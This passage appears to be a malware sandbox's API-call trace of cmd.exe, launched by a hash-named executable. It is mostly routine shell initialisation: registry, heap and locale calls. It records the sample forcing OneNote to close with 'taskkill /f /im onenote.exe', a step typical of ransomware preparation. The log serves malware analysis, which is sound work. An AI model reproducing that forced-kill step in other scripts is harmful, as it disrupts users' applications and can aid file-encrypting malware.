[0211.927] __p__commode () returned 0x74975b1c [0211.953] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0xf25200) returned 0x0 [0211.953] __getmainargs (in: _Argc=0xf360e8, _Argv=0xf360ec, _Env=0xf360f0, _DoWildCard=0, _StartInfo=0xf360fc | out: _Argc=0xf360e8, _Argv=0xf360ec, _Env=0xf360f0) returned 0 [0211.953] GetCurrentThreadId () returned 0xe40 [0211.954] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0xe40) returned 0x78 [0211.954] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x75600000 [0211.954] GetProcAddress (hModule=0x75600000, lpProcName="SetThreadUILanguage") returned 0x75642510 [0211.954] SetThreadUILanguage (LangId=0x0) returned 0x409 [0211.978] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0211.978] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x19ff18 | out: phkResult=0x19ff18*=0x0) returned 0x2 [0211.978] VirtualQuery (in: lpAddress=0x19ff1f, lpBuffer=0x19fed0, dwLength=0x1c | out: lpBuffer=0x19fed0*(BaseAddress=0x19f000, AllocationBase=0xa0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0211.978] VirtualQuery (in: lpAddress=0xa0000, lpBuffer=0x19fed0, dwLength=0x1c | out: lpBuffer=0x19fed0*(BaseAddress=0xa0000, AllocationBase=0xa0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0211.978] VirtualQuery (in: lpAddress=0xa1000, lpBuffer=0x19fed0, dwLength=0x1c | out: lpBuffer=0x19fed0*(BaseAddress=0xa1000, AllocationBase=0xa0000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0211.978] VirtualQuery (in: lpAddress=0xa3000, lpBuffer=0x19fed0, dwLength=0x1c | out: lpBuffer=0x19fed0*(BaseAddress=0xa3000, AllocationBase=0xa0000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0211.978] VirtualQuery (in: lpAddress=0x1a0000, lpBuffer=0x19fed0, dwLength=0x1c | out: lpBuffer=0x19fed0*(BaseAddress=0x1a0000, AllocationBase=0x1a0000, AllocationProtect=0x2, RegionSize=0x4000, State=0x1000, Protect=0x2, Type=0x40000)) returned 0x1c [0211.979] GetConsoleOutputCP () returned 0x1b5 [0211.986] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0xf3f460 | out: lpCPInfo=0xf3f460) returned 1 [0211.986] SetConsoleCtrlHandler (HandlerRoutine=0xf30e40, Add=1) returned 1 [0211.987] _get_osfhandle (_FileHandle=1) returned 0x13c [0211.987] SetConsoleMode (hConsoleHandle=0x13c, dwMode=0x0) returned 0 [0211.987] _get_osfhandle (_FileHandle=1) returned 0x13c [0211.987] GetConsoleMode (in: hConsoleHandle=0x13c, lpMode=0xf3f40c | out: lpMode=0xf3f40c) returned 0 [0211.987] _get_osfhandle (_FileHandle=0) returned 0x130 [0211.987] GetConsoleMode (in: hConsoleHandle=0x130, lpMode=0xf3f408 | out: lpMode=0xf3f408) returned 0 [0211.987] GetEnvironmentStringsW () returned 0x487fe8* [0211.987] GetProcessHeap () returned 0x480000 [0211.987] RtlAllocateHeap (HeapHandle=0x480000, Flags=0x8, Size=0xa1a) returned 0x488a10 [0211.987] FreeEnvironmentStringsA (penv="A") returned 1 [0211.987] GetProcessHeap () returned 0x480000 [0211.987] RtlAllocateHeap (HeapHandle=0x480000, Flags=0x8, Size=0x4) returned 0x483418 [0211.987] GetEnvironmentStringsW () returned 0x487fe8* [0211.987] GetProcessHeap () returned 0x480000 [0211.987] RtlAllocateHeap (HeapHandle=0x480000, Flags=0x8, Size=0xa1a) returned 0x489438 [0211.988] FreeEnvironmentStringsA (penv="A") returned 1 [0211.988] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x19ee7c | out: phkResult=0x19ee7c*=0x88) returned 0x0 [0211.988] RegQueryValueExW (in: hKey=0x88, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x19ee84, lpData=0x19ee88, lpcbData=0x19ee80*=0x1000 | out: lpType=0x19ee84*=0x0, lpData=0x19ee88*=0x49, lpcbData=0x19ee80*=0x1000) returned 0x2 [0211.988] RegQueryValueExW (in: hKey=0x88, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x19ee84, lpData=0x19ee88, lpcbData=0x19ee80*=0x1000 | out: lpType=0x19ee84*=0x4, lpData=0x19ee88*=0x1, lpcbData=0x19ee80*=0x4) returned 0x0 [0211.988] RegQueryValueExW (in: hKey=0x88, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x19ee84, lpData=0x19ee88, lpcbData=0x19ee80*=0x1000 | out: lpType=0x19ee84*=0x0, lpData=0x19ee88*=0x1, lpcbData=0x19ee80*=0x1000) returned 0x2 [0211.988] RegQueryValueExW (in: hKey=0x88, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x19ee84, lpData=0x19ee88, lpcbData=0x19ee80*=0x1000 | out: lpType=0x19ee84*=0x4, lpData=0x19ee88*=0x0, lpcbData=0x19ee80*=0x4) returned 0x0 [0211.988] RegQueryValueExW (in: hKey=0x88, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x19ee84, lpData=0x19ee88, lpcbData=0x19ee80*=0x1000 | out: lpType=0x19ee84*=0x4, lpData=0x19ee88*=0x40, lpcbData=0x19ee80*=0x4) returned 0x0 [0211.988] RegQueryValueExW (in: hKey=0x88, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x19ee84, lpData=0x19ee88, lpcbData=0x19ee80*=0x1000 | out: lpType=0x19ee84*=0x4, lpData=0x19ee88*=0x40, lpcbData=0x19ee80*=0x4) returned 0x0 [0211.988] RegQueryValueExW (in: hKey=0x88, lpValueName="AutoRun", lpReserved=0x0, lpType=0x19ee84, lpData=0x19ee88, lpcbData=0x19ee80*=0x1000 | out: lpType=0x19ee84*=0x0, lpData=0x19ee88*=0x40, lpcbData=0x19ee80*=0x1000) returned 0x2 [0211.988] RegCloseKey (hKey=0x88) returned 0x0 [0211.989] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x19ee7c | out: phkResult=0x19ee7c*=0x88) returned 0x0 [0211.989] RegQueryValueExW (in: hKey=0x88, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x19ee84, lpData=0x19ee88, lpcbData=0x19ee80*=0x1000 | out: lpType=0x19ee84*=0x0, lpData=0x19ee88*=0x40, lpcbData=0x19ee80*=0x1000) returned 0x2 [0211.989] RegQueryValueExW (in: hKey=0x88, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x19ee84, lpData=0x19ee88, lpcbData=0x19ee80*=0x1000 | out: lpType=0x19ee84*=0x4, lpData=0x19ee88*=0x1, lpcbData=0x19ee80*=0x4) returned 0x0 [0211.989] RegQueryValueExW (in: hKey=0x88, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x19ee84, lpData=0x19ee88, lpcbData=0x19ee80*=0x1000 | out: lpType=0x19ee84*=0x0, lpData=0x19ee88*=0x1, lpcbData=0x19ee80*=0x1000) returned 0x2 [0211.989] RegQueryValueExW (in: hKey=0x88, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x19ee84, lpData=0x19ee88, lpcbData=0x19ee80*=0x1000 | out: lpType=0x19ee84*=0x4, lpData=0x19ee88*=0x0, lpcbData=0x19ee80*=0x4) returned 0x0 [0211.989] RegQueryValueExW (in: hKey=0x88, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x19ee84, lpData=0x19ee88, lpcbData=0x19ee80*=0x1000 | out: lpType=0x19ee84*=0x4, lpData=0x19ee88*=0x9, lpcbData=0x19ee80*=0x4) returned 0x0 [0211.989] RegQueryValueExW (in: hKey=0x88, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x19ee84, lpData=0x19ee88, lpcbData=0x19ee80*=0x1000 | out: lpType=0x19ee84*=0x4, lpData=0x19ee88*=0x9, lpcbData=0x19ee80*=0x4) returned 0x0 [0211.989] RegQueryValueExW (in: hKey=0x88, lpValueName="AutoRun", lpReserved=0x0, lpType=0x19ee84, lpData=0x19ee88, lpcbData=0x19ee80*=0x1000 | out: lpType=0x19ee84*=0x0, lpData=0x19ee88*=0x9, lpcbData=0x19ee80*=0x1000) returned 0x2 [0211.989] RegCloseKey (hKey=0x88) returned 0x0 [0211.989] time (in: timer=0x0 | out: timer=0x0) returned 0x62344242 [0211.989] srand (_Seed=0x62344242) [0211.989] GetCommandLineW () returned="cmd.exe /c \"taskkill /f /im onenote.exe \"" [0211.989] GetCommandLineW () returned="cmd.exe /c \"taskkill /f /im onenote.exe \"" [0211.989] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0xf47720 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Desktop") returned 0x1d [0211.990] GetProcessHeap () returned 0x480000 [0211.990] RtlAllocateHeap (HeapHandle=0x480000, Flags=0x8, Size=0x210) returned 0x486fb8 [0211.990] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x486fc0, nSize=0x104 | out: lpFilename="C:\\Windows\\SysWOW64\\cmd.exe" (normalized: "c:\\windows\\syswow64\\cmd.exe")) returned 0x1b [0211.990] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0xf3f4a0, nSize=0x2000 | out: lpBuffer="") returned 0x63 [0211.990] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0xf3f4a0, nSize=0x2000 | out: lpBuffer="") returned 0x35 [0211.990] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0xf3f4a0, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0211.990] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0211.990] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0211.990] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0211.990] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0211.990] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0211.990] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0211.990] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0211.990] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0211.991] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0211.991] GetProcessHeap () returned 0x480000 [0211.991] RtlFreeHeap (HeapHandle=0x480000, Flags=0x0, BaseAddress=0x488a10) returned 1 [0211.991] GetEnvironmentStringsW () returned 0x487fe8* [0211.992] GetProcessHeap () returned 0x480000 [0211.992] RtlAllocateHeap (HeapHandle=0x480000, Flags=0x8, Size=0xa32) returned 0x48a8a0 [0211.992] FreeEnvironmentStringsA (penv="A") returned 1 [0211.992] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0xf3f4a0, nSize=0x2000 | out: lpBuffer="") returned 0x1b [0211.992] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0xf3f4a0, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0211.992] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0211.992] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0211.992] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0211.992] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0211.992] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0211.992] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0211.992] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0211.992] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0211.992] GetProcessHeap () returned 0x480000 [0211.992] RtlAllocateHeap (HeapHandle=0x480000, Flags=0x8, Size=0x44) returned 0x487e68 [0211.992] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x19fc54 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Desktop") returned 0x1d [0211.993] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop", nBufferLength=0x104, lpBuffer=0x19fc54, lpFilePart=0x19fc4c | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Desktop", lpFilePart=0x19fc4c*="Desktop") returned 0x1d [0211.993] GetFileAttributesW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop")) returned 0x11 [0211.993] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x19f9d0 | out: lpFindFileData=0x19f9d0*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x31bae0f4, ftCreationTime.dwHighDateTime=0x1d112dc, ftLastAccessTime.dwLowDateTime=0x3ce179de, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x3ce179de, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Users", cAlternateFileName="")) returned 0x4871d0 [0211.994] FindClose (in: hFindFile=0x4871d0 | out: hFindFile=0x4871d0) returned 1 [0211.994] FindFirstFileW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX", lpFindFileData=0x19f9d0 | out: lpFindFileData=0x19f9d0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x3ce179de, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x84ac775d, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x84ac775d, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="RDhJ0CNFevzX", cAlternateFileName="RDHJ0C~1")) returned 0x4871d0 [0211.994] FindClose (in: hFindFile=0x4871d0 | out: hFindFile=0x4871d0) returned 1 [0211.994] _wcsnicmp (_String1="RDHJ0C~1", _String2="RDhJ0CNFevzX", _MaxCount=0xc) returned 16 [0211.994] FindFirstFileW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop", lpFindFileData=0x19f9d0 | out: lpFindFileData=0x19f9d0*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x3ced6473, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x8d4a6a0d, ftLastAccessTime.dwHighDateTime=0x1d83aa1, ftLastWriteTime.dwLowDateTime=0x8d4a6a0d, ftLastWriteTime.dwHighDateTime=0x1d83aa1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Desktop", cAlternateFileName="")) returned 0x4871d0 [0211.994] FindClose (in: hFindFile=0x4871d0 | out: hFindFile=0x4871d0) returned 1 [0211.994] GetFileAttributesW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop")) returned 0x11 [0211.995] SetCurrentDirectoryW (lpPathName="C:\\Users\\RDhJ0CNFevzX\\Desktop" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop")) returned 1 [0211.995] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\RDhJ0CNFevzX\\Desktop") returned 1 [0211.995] GetProcessHeap () returned 0x480000 [0211.995] RtlFreeHeap (HeapHandle=0x480000, Flags=0x0, BaseAddress=0x48a8a0) returned 1 [0211.995] GetEnvironmentStringsW () returned 0x487fe8* [0211.995] GetProcessHeap () returned 0x480000 [0211.995] RtlAllocateHeap (HeapHandle=0x480000, Flags=0x8, Size=0xa76) returned 0x489e60 [0211.995] FreeEnvironmentStringsA (penv="=") returned 1 [0211.995] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0xf47720 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Desktop") returned 0x1d [0211.995] GetProcessHeap () returned 0x480000 [0211.995] RtlFreeHeap (HeapHandle=0x480000, Flags=0x0, BaseAddress=0x487e68) returned 1 [0211.996] GetProcessHeap () returned 0x480000 [0211.996] RtlAllocateHeap (HeapHandle=0x480000, Flags=0x8, Size=0x400e) returned 0x48bd60 [0211.996] GetProcessHeap () returned 0x480000 [0211.996] RtlAllocateHeap (HeapHandle=0x480000, Flags=0x8, Size=0x4a) returned 0x487e68 [0211.996] GetProcessHeap () returned 0x480000 [0211.996] RtlAllocateHeap (HeapHandle=0x480000, Flags=0x8, Size=0x4008) returned 0x48fd78 [0211.997] GetProcessHeap () returned 0x480000 [0211.997] RtlAllocateHeap (HeapHandle=0x480000, Flags=0x8, Size=0x4008) returned 0x493d88 [0211.998] _wcsnicmp (_String1="task", _String2="cmd ", _MaxCount=0x4) returned 17 [0211.998] GetProcessHeap () returned 0x480000 [0211.998] RtlAllocateHeap (HeapHandle=0x480000, Flags=0x8, Size=0x418) returned 0x48a8e0 [0211.998] SetErrorMode (uMode=0x0) returned 0x8003 [0211.998] SetErrorMode (uMode=0x1) returned 0x0 [0211.999] GetFullPathNameW (in: lpFileName="taskkill \\f \\.", nBufferLength=0x208, lpBuffer=0x48a8e8, lpFilePart=0x19fbac | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Desktop\\taskkill \\f", lpFilePart=0x19fbac*="f") returned 0x29 [0211.999] SetErrorMode (uMode=0x8003) returned 0x1 [0211.999] GetProcessHeap () returned 0x480000 [0211.999] RtlReAllocateHeap (Heap=0x480000, Flags=0x0, Ptr=0x48a8e0, Size=0x7c) returned 0x48a8e0 [0211.999] GetProcessHeap () returned 0x480000 [0211.999] RtlSizeHeap (HeapHandle=0x480000, Flags=0x0, MemoryPointer=0x48a8e0) returned 0x7c [0211.999] NeedCurrentDirectoryForExePathW (ExeName="taskkill \\f \\.") returned 1 [0211.999] GetProcessHeap () returned 0x480000 [0211.999] RtlAllocateHeap (HeapHandle=0x480000, Flags=0x8, Size=0x62) returned 0x4871d0 [0211.999] GetProcessHeap () returned 0x480000 [0211.999] RtlAllocateHeap (HeapHandle=0x480000, Flags=0x8, Size=0xb8) returned 0x48a968 [0211.999] GetProcessHeap () returned 0x480000 [0211.999] RtlReAllocateHeap (Heap=0x480000, Flags=0x0, Ptr=0x48a968, Size=0x62) returned 0x48a968 [0211.999] GetProcessHeap () returned 0x480000 [0211.999] RtlSizeHeap (HeapHandle=0x480000, Flags=0x0, MemoryPointer=0x48a968) returned 0x62 [0211.999] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0xf3f4a0, nSize=0x2000 | out: lpBuffer="") returned 0x35 [0211.999] GetProcessHeap () returned 0x480000 [0211.999] RtlAllocateHeap (HeapHandle=0x480000, Flags=0x8, Size=0xe0) returned 0x48a9d8 [0212.004] GetProcessHeap () returned 0x480000 [0212.004] RtlReAllocateHeap (Heap=0x480000, Flags=0x0, Ptr=0x48a9d8, Size=0x76) returned 0x48a9d8 [0212.004] GetProcessHeap () returned 0x480000 [0212.004] RtlSizeHeap (HeapHandle=0x480000, Flags=0x0, MemoryPointer=0x48a9d8) returned 0x76 [0212.004] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0212.004] FindFirstFileExW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop\\taskkill \\f\\im onenote.exe ", fInfoLevelId=0x1, lpFindFileData=0x19f958, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x19f958) returned 0xffffffff [0212.005] GetLastError () returned 0x3 [0212.005] GetProcessHeap () returned 0x480000 [0212.005] RtlFreeHeap (HeapHandle=0x480000, Flags=0x0, BaseAddress=0x48fd78) returned 1 [0212.006] GetProcessHeap () returned 0x480000 [0212.006] RtlFreeHeap (HeapHandle=0x480000, Flags=0x0, BaseAddress=0x493d88) returned 1 [0212.006] GetProcessHeap () returned 0x480000 [0212.007] RtlFreeHeap (HeapHandle=0x480000, Flags=0x0, BaseAddress=0x48bd60) returned 1 [0212.007] GetConsoleOutputCP () returned 0x1b5 [0212.045] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0xf3f460 | out: lpCPInfo=0xf3f460) returned 1 [0212.045] GetUserDefaultLCID () returned 0x409 [0212.047] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0xf434a0, cchData=8 | out: lpLCData=":") returned 2 [0212.047] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x19fd84, cchData=128 | out: lpLCData="0") returned 2 [0212.047] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x19fd84, cchData=128 | out: lpLCData="0") returned 2 [0212.047] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x19fd84, cchData=128 | out: lpLCData="1") returned 2 [0212.047] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0xf434b0, cchData=8 | out: lpLCData="/") returned 2 [0212.047] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0xf43500, cchData=32 | out: lpLCData="Mon") returned 4 [0212.047] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0xf43540, cchData=32 | out: lpLCData="Tue") returned 4 [0212.047] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0xf43580, cchData=32 | out: lpLCData="Wed") returned 4 [0212.047] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0xf435c0, cchData=32 | out: lpLCData="Thu") returned 4 [0212.047] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0xf43600, cchData=32 | out: lpLCData="Fri") returned 4 [0212.048] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0xf43640, cchData=32 | out: lpLCData="Sat") returned 4 [0212.048] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0xf43680, cchData=32 | out: lpLCData="Sun") returned 4 [0212.048] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0xf434c0, cchData=8 | out: lpLCData=".") returned 2 [0212.048] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0xf434e0, cchData=8 | out: lpLCData=",") returned 2 [0212.048] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0212.050] GetProcessHeap () returned 0x480000 [0212.050] RtlAllocateHeap (HeapHandle=0x480000, Flags=0x0, Size=0x20c) returned 0x48aa58 [0212.050] GetConsoleTitleW (in: lpConsoleTitle=0x48aa58, nSize=0x104 | out: lpConsoleTitle="C:\\Users\\RDhJ0CNFevzX\\Desktop\\ec7bae245d61cb7f7a9fa51f487a22e006109d628645f31b880fc72ac58f8027.exe") returned 0x62 [0212.058] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x75600000 [0212.058] GetProcAddress (hModule=0x75600000, lpProcName="CopyFileExW") returned 0x7561ffc0 [0212.058] GetProcAddress (hModule=0x75600000, lpProcName="IsDebuggerPresent") returned 0x7561b0b0 [0212.058] GetProcAddress (hModule=0x75600000, lpProcName="SetConsoleInputExeNameW") returned 0x7559b440 [0212.059] GetProcessHeap () returned 0x480000 [0212.059] RtlAllocateHeap (HeapHandle=0x480000, Flags=0x8, Size=0x400a) returned 0x48bd60 [0212.059] GetProcessHeap () returned 0x480000 [0212.060] RtlFreeHeap (HeapHandle=0x480000, Flags=0x0, BaseAddress=0x48bd60) returned 1 [0212.060] _wcsicmp (_String1="taskkill", _String2=")") returned 75 [0212.061] _wcsicmp (_String1="FOR", _String2="taskkill") returned -14 [0212.061] _wcsicmp (_String1="FOR/?", _String2="taskkill") returned -14 [0212.061] _wcsicmp (_String1="IF", _String2="taskkill") returned -11 [0212.061] _wcsicmp (_String1="IF/?", _String2="taskkill") returned -11 [0212.061] _wcsicmp (_String1="REM", _String2="taskkill") returned -2 [0212.061] _wcsicmp (_String1="REM/?", _String2="taskkill") returned -2 [0212.061] GetProcessHeap () returned 0x480000 [0212.061] RtlAllocateHeap (HeapHandle=0x480000, Flags=0x8, Size=0x58) returned 0x48ac70 [0212.061] GetProcessHeap () returned 0x480000 [0212.061] RtlAllocateHeap (HeapHandle=0x480000, Flags=0x8, Size=0x1a) returned 0x48acd0 [0212.062] GetProcessHeap () returned 0x480000 [0212.062] RtlAllocateHeap (HeapHandle=0x480000, Flags=0x8, Size=0x32) returned 0x48acf8 [0212.063] GetConsoleTitleW (in: lpConsoleTitle=0x19fa70, nSize=0x104 | out: lpConsoleTitle="C:\\Users\\RDhJ0CNFevzX\\Desktop\\ec7bae245d61cb7f7a9fa51f487a22e006109d628645f31b880fc72ac58f8027.exe") returned 0x62 [0212.067] _wcsicmp (_String1="taskkill", _String2="DIR") returned 16 [0212.067] _wcsicmp (_String1="taskkill", _String2="ERASE") returned 15 [0212.067] _wcsicmp (_String1="taskkill", _String2="DEL") returned 16 [0212.067] _wcsicmp (_String1="taskkill", _String2="TYPE") returned -24 [0212.067] _wcsicmp (_String1="taskkill", _String2="COPY") returned 17 [0212.067] _wcsicmp (_String1="taskkill", _String2="CD") returned 17 [0212.067] _wcsicmp (_String1="taskkill", _String2="CHDIR") returned 17 [0212.067] _wcsicmp (_String1="taskkill", _String2="RENAME") returned 2 [0212.067] _wcsicmp (_String1="taskkill", _String2="REN") returned 2 [0212.067] _wcsicmp (_String1="taskkill", _String2="ECHO") returned 15 [0212.067] _wcsicmp (_String1="taskkill", _String2="SET") returned 1 [0212.067] _wcsicmp (_String1="taskkill", _String2="PAUSE") returned 4 [0212.067] _wcsicmp (_String1="taskkill", _String2="DATE") returned 16 [0212.067] _wcsicmp (_String1="taskkill", _String2="TIME") returned -8 [0212.067] _wcsicmp (_String1="taskkill", _String2="PROMPT") returned 4 [0212.067] _wcsicmp (_String1="taskkill", _String2="MD") returned 7 [0212.067] _wcsicmp (_String1="taskkill", _String2="MKDIR") returned 7 [0212.067] _wcsicmp (_String1="taskkill", _String2="RD") returned 2 [0212.067] _wcsicmp (_String1="taskkill", _String2="RMDIR") returned 2 [0212.067] _wcsicmp (_String1="taskkill", _String2="PATH") returned 4 [0212.068] _wcsicmp (_String1="taskkill", _String2="GOTO") returned 13 [0212.068] _wcsicmp (_String1="taskkill", _String2="SHIFT") returned 1 [0212.068] _wcsicmp (_String1="taskkill", _String2="CLS") returned 17 [0212.068] _wcsicmp (_String1="taskkill", _String2="CALL") returned 17 [0212.068] _wcsicmp (_String1="taskkill", _String2="VERIFY") returned -2 [0212.068] _wcsicmp (_String1="taskkill", _String2="VER") returned -2 [0212.068] _wcsicmp (_String1="taskkill", _String2="VOL") returned -2 [0212.068] _wcsicmp (_String1="taskkill", _String2="EXIT") returned 15 [0212.068] _wcsicmp (_String1="taskkill", _String2="SETLOCAL") returned 1 [0212.068] _wcsicmp (_String1="taskkill", _String2="ENDLOCAL") returned 15 [0212.068] _wcsicmp (_String1="taskkill", _String2="TITLE") returned -8 [0212.068] _wcsicmp (_String1="taskkill", _String2="START") returned 1 [0212.068] _wcsicmp (_String1="taskkill", _String2="DPATH") returned 16 [0212.068] _wcsicmp (_String1="taskkill", _String2="KEYS") returned 9 [0212.068] _wcsicmp (_String1="taskkill", _String2="MOVE") returned 7 [0212.068] _wcsicmp (_String1="taskkill", _String2="PUSHD") returned 4 [0212.068] _wcsicmp (_String1="taskkill", _String2="POPD") returned 4 [0212.068] _wcsicmp (_String1="taskkill", _String2="ASSOC") returned 19 [0212.068] _wcsicmp (_String1="taskkill", _String2="FTYPE") returned 14 [0212.068] _wcsicmp (_String1="taskkill", _String2="BREAK") returned 18 [0212.068] _wcsicmp (_String1="taskkill", _String2="COLOR") returned 17 [0212.068] _wcsicmp (_String1="taskkill", _String2="MKLINK") returned 7 [0212.071] _wcsicmp (_String1="taskkill", _String2="DIR") returned 16 [0212.071] _wcsicmp (_String1="taskkill", _String2="ERASE") returned 15 [0212.071] _wcsicmp (_String1="taskkill", _String2="DEL") returned 16 [0212.071] _wcsicmp (_String1="taskkill", _String2="TYPE") returned -24 [0212.071] _wcsicmp (_String1="taskkill", _String2="COPY") returned 17 [0212.071] _wcsicmp (_String1="taskkill", _String2="CD") returned 17 [0212.071] _wcsicmp (_String1="taskkill", _String2="CHDIR") returned 17 [0212.071] _wcsicmp (_String1="taskkill", _String2="RENAME") returned 2 [0212.072] _wcsicmp (_String1="taskkill", _String2="REN") returned 2 [0212.072] _wcsicmp (_String1="taskkill", _String2="ECHO") returned 15 [0212.072] _wcsicmp (_String1="taskkill", _String2="SET") returned 1 [0212.072] _wcsicmp (_String1="taskkill", _String2="PAUSE") returned 4 [0212.072] _wcsicmp (_String1="taskkill", _String2="DATE") returned 16 [0212.072] _wcsicmp (_String1="taskkill", _String2="TIME") returned -8 [0212.072] _wcsicmp (_String1="taskkill", _String2="PROMPT") returned 4 [0212.072] _wcsicmp (_String1="taskkill", _String2="MD") returned 7 [0212.072] _wcsicmp (_String1="taskkill", _String2="MKDIR") returned 7 [0212.072] _wcsicmp (_String1="taskkill", _String2="RD") returned 2 [0212.072] _wcsicmp (_String1="taskkill", _String2="RMDIR") returned 2 [0212.072] _wcsicmp (_String1="taskkill", 